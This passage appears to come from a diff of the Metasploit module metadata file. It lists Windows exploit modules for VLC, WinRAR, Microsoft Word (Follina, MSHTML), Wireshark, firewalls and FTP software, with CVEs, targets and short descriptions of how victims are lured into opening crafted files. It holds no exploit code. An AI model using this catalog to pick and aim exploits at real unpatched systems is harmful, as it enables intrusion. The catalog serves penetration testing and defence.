As such,\n this module is capable of bypassing DEP, but not ASLR.", + "references": [ + "CVE-2011-1574", + "OSVDB-72143", + "URL-http://modplug-xmms.git.sourceforge.net/git/gitweb.cgi?p=modplug-xmms/modplug-xmms;a=commitdiff;h=aecef259828a89bb00c2e6f78e89de7363b2237b", + "URL-https://seclists.org/fulldisclosure/2011/Apr/113" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "VLC 1.1.8 on Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/vlc_modplug_s3m", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/vlc_realtext": { + "name": "VLC Media Player RealText Subtitle Overflow", + "fullname": "exploit/windows/fileformat/vlc_realtext", + "aliases": [], + "rank": 400, + "disclosure_date": "2008-11-05", + "type": "exploit", + "author": [ + "Tobias Klein", + "SkD", + "juan vazquez " + ], + "description": "This module exploits a stack buffer overflow vulnerability in\n VideoLAN VLC < 0.9.6. The vulnerability exists in the parsing of\n RealText subtitle files.\n\n In order to exploit this, this module will generate two files:\n The .mp4 file is used to trick your victim into running. 
The .rt file\n is the actual malicious file that triggers the vulnerability, which\n should be placed under the same directory as the .mp4 file.", + "references": [ + "OSVDB-49809", + "CVE-2008-5036", + "BID-32125", + "URL-http://www.trapkit.de/advisories/TKADV2008-011.txt", + "URL-http://www.videolan.org/security/sa0810.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "VLC 0.9.4 on Windows XP SP3 / Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/vlc_realtext.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/vlc_realtext", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/vlc_smb_uri": { + "name": "VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow", + "fullname": "exploit/windows/fileformat/vlc_smb_uri", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-06-24", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in the Win32AddConnection\n function of the VideoLAN VLC media player. Versions 0.9.9 through 1.0.1 are\n reportedly affected.\n\n This vulnerability is only present in Win32 builds of VLC.\n\n This payload was found to work with the windows/exec and\n windows/meterpreter/reverse_tcp payloads. 
However, the\n windows/meterpreter/reverse_ord_tcp was found not to work.", + "references": [ + "BID-35500", + "OSVDB-55509", + "CVE-2009-2484", + "URL-http://git.videolan.org/?p=vlc.git;a=commit;h=e60a9038b13b5eb805a76755efc5c6d5e080180f", + "EDB-9029" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "vlc 0.9.9 on Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/vlc_smb_uri.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/vlc_smb_uri", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/vlc_webm": { + "name": "VideoLAN VLC MKV Memory Corruption", + "fullname": "exploit/windows/fileformat/vlc_webm", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-01-31", + "type": "exploit", + "author": [ + "Dan Rosenberg" + ], + "description": "This module exploits an input validation error in VideoLAN VLC\n < 1.1.7. 
By creating a malicious MKV or WebM file, a remote attacker\n could execute arbitrary code.\n\n NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to\n permanently enable NX support on machines that support it.", + "references": [ + "OSVDB-70698", + "CVE-2011-0531", + "BID-46060", + "URL-http://git.videolan.org/?p=vlc.git&a=commitdiff&h=59491dcedffbf97612d2c572943b56ee4289dd07&hp=f085cfc1c95b922e3c750ee93ec58c3f2d5f7456", + "URL-http://www.videolan.org/security/sa1102.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "VLC 1.1.6 on Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/vlc_webm.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/vlc_webm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/vuplayer_cue": { + "name": "VUPlayer CUE Buffer Overflow", + "fullname": "exploit/windows/fileformat/vuplayer_cue", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-08-18", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack based overflow in VUPlayer <= 2.49. 
When\n the application is used to open a specially crafted cue file, a buffer is overwritten allowing\n for the execution of arbitrary code.", + "references": [ + "OSVDB-64581", + "BID-33960" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "VUPlayer 2.49" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/vuplayer_cue.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/vuplayer_cue", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/vuplayer_m3u": { + "name": "VUPlayer M3U Buffer Overflow", + "fullname": "exploit/windows/fileformat/vuplayer_m3u", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-08-18", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack over flow in VUPlayer <= 2.49. 
When\n the application is used to open a specially crafted m3u file, an buffer is overwritten allowing\n for the execution of arbitrary code.", + "references": [ + "CVE-2006-6251", + "OSVDB-31710" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "VUPlayer 2.49" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/vuplayer_m3u.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/vuplayer_m3u", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/watermark_master": { + "name": "Watermark Master Buffer Overflow (SEH)", + "fullname": "exploit/windows/fileformat/watermark_master", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-11-01", + "type": "exploit", + "author": [ + "metacom", + "Andrew Smith" + ], + "description": "This module exploits a stack based buffer overflow in Watermark Master 2.2.23 when\n processing a specially crafted .WCF file. 
This vulnerability could be\n exploited by a remote attacker to execute arbitrary code on the target\n machine by enticing a user of Watermark Master to open a malicious .WCF file.", + "references": [ + "OSVDB-99226", + "CVE-2013-6935", + "EDB-29327" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 7 x32 - Watermark Master 2.2.23", + "Windows 7 x64 - Watermark Master 2.2.23" + ], + "mod_time": "2023-03-22 12:52:15 +0000", + "path": "/modules/exploits/windows/fileformat/watermark_master.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/watermark_master", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/winamp_maki_bof": { + "name": "Winamp MAKI Buffer Overflow", + "fullname": "exploit/windows/fileformat/winamp_maki_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-05-20", + "type": "exploit", + "author": [ + "Monica Sojeong Hong", + "juan vazquez " + ], + "description": "This module exploits a stack based buffer overflow in Winamp 5.55. The flaw\n exists in the gen_ff.dll and occurs while parsing a specially crafted MAKI file,\n where memmove is used in an insecure way with user controlled data.\n\n To exploit the vulnerability the attacker must convince the victim to install the\n generated mcvcore.maki file in the \"scripts\" directory of the default \"Bento\" skin,\n or generate a new skin using the crafted mcvcore.maki file. 
The module has been\n tested successfully on Windows XP SP3 and Windows 7 SP1.", + "references": [ + "CVE-2009-1831", + "OSVDB-54902", + "BID-35052", + "EDB-8783", + "EDB-8772", + "EDB-8770", + "EDB-8767", + "URL-http://vrt-sourcefire.blogspot.com/2009/05/winamp-maki-parsing-vulnerability.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Winamp 5.55 / Windows XP SP3 / Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/winamp_maki_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/winamp_maki_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/winrar_ace": { + "name": "RARLAB WinRAR ACE Format Input Validation Remote Code Execution", + "fullname": "exploit/windows/fileformat/winrar_ace", + "aliases": [], + "rank": 600, + "disclosure_date": "2019-02-05", + "type": "exploit", + "author": [ + "Nadav Grossman", + "Imran E. Dawoodjee " + ], + "description": "In WinRAR versions prior to and including 5.61, there is path traversal vulnerability\n when crafting the filename field of the ACE format (in UNACEV2.dll). When the filename\n field is manipulated with specific patterns, the destination (extraction) folder is\n ignored, thus treating the filename as an absolute path. This module will attempt to\n extract a payload to the startup folder of the current user. It is limited such that\n we can only go back one folder. Therefore, for this exploit to work properly, the user\n must extract the supplied RAR file from one folder within the user profile folder\n (e.g. Desktop or Downloads). 
User restart is required to gain a shell.", + "references": [ + "CVE-2018-20250", + "EDB-46552", + "BID-106948", + "URL-https://research.checkpoint.com/extracting-code-execution-from-winrar/", + "URL-https://apidoc.roe.ch/acefile/latest/", + "URL-http://www.hugi.scene.org/online/coding/hugi%2012%20-%20coace.htm" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "RARLAB WinRAR <= 5.61" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/winrar_ace.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/winrar_ace", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/winrar_cve_2023_38831": { + "name": "WinRAR CVE-2023-38831 Exploit", + "fullname": "exploit/windows/fileformat/winrar_cve_2023_38831", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-08-23", + "type": "exploit", + "author": [ + "Alexander \"xaitax\" Hagenah" + ], + "description": "This module exploits a vulnerability in WinRAR (CVE-2023-38831). 
When a user opens a crafted RAR file and its\n embedded document, the decoy document is executed, leading to code execution.", + "references": [ + "CVE-2023-38831", + "URL-https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/", + "URL-https://b1tg.github.io/post/cve-2023-38831-winrar-analysis/" + ], + "platform": "Windows", + "arch": "x64, x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2024-05-28 14:01:31 +0000", + "path": "/modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/winrar_cve_2023_38831", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/winrar_name_spoofing": { + "name": "WinRAR Filename Spoofing", + "fullname": "exploit/windows/fileformat/winrar_name_spoofing", + "aliases": [], + "rank": 600, + "disclosure_date": "2009-09-28", + "type": "exploit", + "author": [ + "chr1x", + "juan vazquez " + ], + "description": "This module abuses a filename spoofing vulnerability in WinRAR. The vulnerability exists\n when opening ZIP files. The file names showed in WinRAR when opening a ZIP file come from\n the central directory, but the file names used to extract and open contents come from the\n Local File Header. 
This inconsistency allows to spoof file names when opening ZIP files\n with WinRAR, which can be abused to execute arbitrary code, as exploited in the wild in\n March 2014", + "references": [ + "OSVDB-62610", + "BID-66383", + "URL-http://securityaffairs.co/wordpress/23623/hacking/winrar-zero-day.html", + "URL-http://an7isec.blogspot.co.il/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/winrar_name_spoofing.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/winrar_name_spoofing", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/wireshark_mpeg_overflow": { + "name": "Wireshark wiretap/mpeg.c Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/wireshark_mpeg_overflow", + "aliases": [], + "rank": 400, + "disclosure_date": "2014-03-20", + "type": "exploit", + "author": [ + "Wesley Neelen", + "j0sm1" + ], + "description": "This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5\n by generating a malicious file.", + "references": [ + "CVE-2014-2299", + "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9843", + "URL-http://www.wireshark.org/security/wnpa-sec-2014-04.html", + "BID-66066" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "WinXP SP3 Spanish (bypass DEP)", + "WinXP SP2/SP3 English (bypass DEP)" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/wireshark_mpeg_overflow", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": 
false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/wireshark_packet_dect": { + "name": "Wireshark packet-dect.c Stack Buffer Overflow (local)", + "fullname": "exploit/windows/fileformat/wireshark_packet_dect", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-04-18", + "type": "exploit", + "author": [ + "Paul Makowski", + "sickness", + "corelanc0d3r " + ], + "description": "This module exploits a stack buffer overflow in Wireshark <= 1.4.4\n When opening a malicious .pcap file in Wireshark, a stack buffer occurs,\n resulting in arbitrary code execution.\n\n Note: To exploit the vulnerability remotely with Scapy: sendp(rdpcap(\"file\")).", + "references": [ + "CVE-2011-1591", + "OSVDB-71848", + "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838", + "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836", + "EDB-17185" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Win32 Universal (Generic DEP & ASLR Bypass)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/wireshark_packet_dect.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/wireshark_packet_dect", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/wm_downloader_m3u": { + "name": "WM Downloader 3.1.2.2 Buffer Overflow", + "fullname": "exploit/windows/fileformat/wm_downloader_m3u", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-07-28", + "type": "exploit", + "author": [ + "fdisk", + "dookie" + ], + "description": "This module exploits a buffer overflow in WM Downloader v3.1.2.2. 
When\n the application is used to import a specially crafted m3u file, a buffer overflow occurs\n allowing arbitrary code execution.", + "references": [ + "OSVDB-66911", + "EDB-14497" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/wm_downloader_m3u.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/wm_downloader_m3u", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/word_msdtjs_rce": { + "name": "Microsoft Office Word MSDTJS", + "fullname": "exploit/windows/fileformat/word_msdtjs_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2022-05-29", + "type": "exploit", + "author": [ + "nao sec", + "mekhalleh (RAMELLA Sébastien)", + "bwatters-r7" + ], + "description": "This module generates a malicious Microsoft Word document that when loaded, will leverage the remote template\n feature to fetch an `HTML` document and then use the `ms-msdt` scheme to execute `PowerShell` code.", + "references": [ + "CVE-2022-30190", + "URL-https://www.reddit.com/r/blueteamsec/comments/v06w2o/suspected_microsoft_word_zero_day_in_the_wild/", + "URL-https://twitter.com/nao_sec/status/1530196847679401984?t=3Pjrpdog_H6OfMHVLMR5eQ&s=19", + "URL-https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", + "URL-https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", + "URL-https://twitter.com/GossiTheDog/status/1531608245009367040", + "URL-https://github.com/JMousqueton/PoC-CVE-2022-30190" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Microsoft Office Word" + ], + "mod_time": "2024-05-28 14:01:31 +0000", + "path": 
"/modules/exploits/windows/fileformat/word_msdtjs_rce.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/word_msdtjs_rce", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "Follina" + ], + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "unreliable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/word_mshtml_rce": { + "name": "Microsoft Office Word Malicious MSHTML RCE", + "fullname": "exploit/windows/fileformat/word_mshtml_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2021-09-23", + "type": "exploit", + "author": [ + "lockedbyte", + "klezVirus", + "thesunRider", + "mekhalleh (RAMELLA Sébastien)" + ], + "description": "This module creates a malicious docx file that when opened in Word on a vulnerable Windows\n system will lead to code execution. This vulnerability exists because an attacker can\n craft a malicious ActiveX control to be used by a Microsoft Office document that hosts\n the browser rendering engine.", + "references": [ + "CVE-2021-40444", + "URL-https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444", + "URL-https://www.sentinelone.com/blog/peeking-into-cve-2021-40444-ms-office-zero-day-vulnerability-exploited-in-the-wild/", + "URL-http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf", + "URL-https://github.com/lockedbyte/CVE-2021-40444/blob/master/REPRODUCE.md", + "URL-https://github.com/klezVirus/CVE-2021-40444" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Hosted" + ], + "mod_time": "2024-05-28 14:01:31 +0000", + "path": "/modules/exploits/windows/fileformat/word_mshtml_rce.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/word_mshtml_rce", + "check": false, + "post_auth": false, + 
"default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "unreliable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/xenorate_xpl_bof": { + "name": "Xenorate 2.50 (.xpl) Universal Local Buffer Overflow (SEH)", + "fullname": "exploit/windows/fileformat/xenorate_xpl_bof", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-08-19", + "type": "exploit", + "author": [ + "hack4love ", + "germaya_x", + "loneferret", + "jduck " + ], + "description": "This module exploits a stack buffer overflow in Xenorate 2.50\n by creating a specially crafted xpl file.", + "references": [ + "OSVDB-57162", + "EDB-10371" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP2 / SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/xenorate_xpl_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/xion_m3u_sehbof": { + "name": "Xion Audio Player 1.0.126 Unicode Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/xion_m3u_sehbof", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-11-23", + "type": "exploit", + "author": [ + "hadji samir ", + "corelanc0d3r ", + "digital1", + "jduck ", + "m_101" + ], + "description": "This module exploits a stack buffer overflow in Xion Audio Player prior to version\n 1.0.126. The vulnerability is triggered when opening a malformed M3U file that\n contains an overly long string. 
This results in overwriting a\n structured exception handler record.", + "references": [ + "OSVDB-66912", + "EDB-14517", + "EDB-14633", + "EDB-15598" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Xion Audio Player v1.0.126 XP Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/xion_m3u_sehbof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/xradio_xrl_sehbof": { + "name": "xRadio 0.95b Buffer Overflow", + "fullname": "exploit/windows/fileformat/xradio_xrl_sehbof", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-02-08", + "type": "exploit", + "author": [ + "b0telh0 " + ], + "description": "This module exploits a buffer overflow in xRadio 0.95b.\n Using the application to import a specially crafted xrl file,\n a buffer overflow occurs allowing arbitrary code execution.", + "references": [ + "CVE-2008-2789", + "BID-46290", + "EDB-16141" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/xradio_xrl_sehbof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/zahir_enterprise_plus_csv": { + "name": "Zahir Enterprise Plus 6 Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/zahir_enterprise_plus_csv", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-09-28", + "type": "exploit", + "author": [ + 
"f3ci", + "modpr0be" + ], + "description": "This module exploits a stack buffer overflow in Zahir Enterprise Plus version 6 build 10b and below.\n The vulnerability is triggered when opening a CSV file containing CR/LF and overly long string characters\n via Import from other File. This results in overwriting a structured exception handler record.", + "references": [ + "CVE-2018-17408", + "EDB-45505" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Zahir Enterprise Plus 6 <= build 10b" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/zahir_enterprise_plus_csv", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/zinfaudioplayer221_pls": { + "name": "Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/zinfaudioplayer221_pls", + "aliases": [], + "rank": 400, + "disclosure_date": "2004-09-24", + "type": "exploit", + "author": [ + "Trancek ", + "aushack " + ], + "description": "This module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1.\n An attacker must send the file to victim and the victim must open the file.\n Alternatively it may be possible to execute code remotely via an embedded\n PLS file within a browser, when the PLS extension is registered to Zinf.\n This functionality has not been tested in this module.", + "references": [ + "CVE-2004-0964", + "OSVDB-10416", + "EDB-7888", + "BID-11248" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Zinf Universal 2.2.1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": 
"/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/zinfaudioplayer221_pls", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/firewall/blackice_pam_icq": { + "name": "ISS PAM.dll ICQ Parser Buffer Overflow", + "fullname": "exploit/windows/firewall/blackice_pam_icq", + "aliases": [], + "rank": 500, + "disclosure_date": "2004-03-18", + "type": "exploit", + "author": [ + "spoonm " + ], + "description": "This module exploits a stack buffer overflow in the ISS products that use\n the iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation\n will result in arbitrary code execution as LocalSystem. This exploit\n only requires 1 UDP packet, which can be both spoofed and sent to a broadcast\n address.\n\n The ISS exception handler will recover the process after each overflow, giving\n us the ability to bruteforce the service and exploit it multiple times.", + "references": [ + "CVE-2004-0362", + "OSVDB-4355", + "URL-http://www.eeye.com/html/Research/Advisories/AD20040318.html" + ], + "platform": "Windows", + "arch": "", + "rport": 1, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Bruteforce", + "Bruteforce iis-pam1.dll", + "Bruteforce NT 4.0", + "iis-pam1.dll 3.6.06", + "iis-pam1.dll 3.6.11", + "WinNT SP3/SP4/SP5", + "WinNT SP4/SP5", + "WinNT SP5/SP6 - advapi32", + "WinNT SP3/SP5/SP6 - shell32", + "WinNT SP5/SP6 - mswsock", + "WinXP SP0/SP1 - shell32", + "WinXP SP0/SP1 - atl", + "WinXP SP0/SP1 - atl", + "WinXP SP0/SP1 - ws2_32", + "WinXP SP0/SP1 - mswsock", + "Windows 2000 Pro SP4 English", + "Win2000 SP0 - SP4", + "Win2000 SP2/SP3 - samlib", + "Win2000 SP0/SP1 - activeds", + "Windows XP Pro SP0 English", + "Windows XP Pro SP1 English", + "WinXP SP0 - SP1", + "Win2003 SP0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": 
"/modules/exploits/windows/firewall/blackice_pam_icq.rb", + "is_install_path": true, + "ref_name": "windows/firewall/blackice_pam_icq", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/firewall/kerio_auth": { + "name": "Kerio Firewall 2.1.4 Authentication Packet Overflow", + "fullname": "exploit/windows/firewall/kerio_auth", + "aliases": [], + "rank": 200, + "disclosure_date": "2003-04-28", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Kerio Personal Firewall\n administration authentication process. This module has only been tested\n against Kerio Personal Firewall 2 (2.1.4).", + "references": [ + "CVE-2003-0220", + "OSVDB-6294", + "BID-7180" + ], + "platform": "Windows", + "arch": "", + "rport": 44334, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro SP4 English", + "Windows XP Pro SP0 English", + "Windows XP Pro SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/firewall/kerio_auth.rb", + "is_install_path": true, + "ref_name": "windows/firewall/kerio_auth", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/32bitftp_list_reply": { + "name": "32bit FTP Client Stack Buffer Overflow ", + "fullname": "exploit/windows/ftp/32bitftp_list_reply", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-10-12", + "type": "exploit", + "author": [ + "fancy", + "corelanc0d3r " + ], + "description": "This module exploits a stack buffer overflow in 32bit ftp client, triggered when trying to\n download a file that has an overly long filename.", + "references": [ + "OSVDB-68703", + "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" + ], + "platform": "Windows", + "arch": "", + 
"rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "XP Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/32bitftp_list_reply.rb", + "is_install_path": true, + "ref_name": "windows/ftp/32bitftp_list_reply", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/3cdaemon_ftp_user": { + "name": "3Com 3CDaemon 2.0 FTP Username Overflow", + "fullname": "exploit/windows/ftp/3cdaemon_ftp_user", + "aliases": [], + "rank": 200, + "disclosure_date": "2005-01-04", + "type": "exploit", + "author": [ + "hdm ", + "otr" + ], + "description": "This module exploits a vulnerability in the 3Com 3CDaemon\n FTP service. This package is being distributed from the 3Com\n web site and is recommended in numerous support documents.\n This module uses the USER command to trigger the overflow.", + "references": [ + "CVE-2005-0277", + "OSVDB-12810", + "OSVDB-12811", + "BID-12155" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Automatic", + "Windows 2000 English", + "Windows XP English SP0/SP1", + "Windows NT 4.0 SP4/SP5/SP6", + "Windows 2000 Pro SP4 French", + "Windows XP English SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": 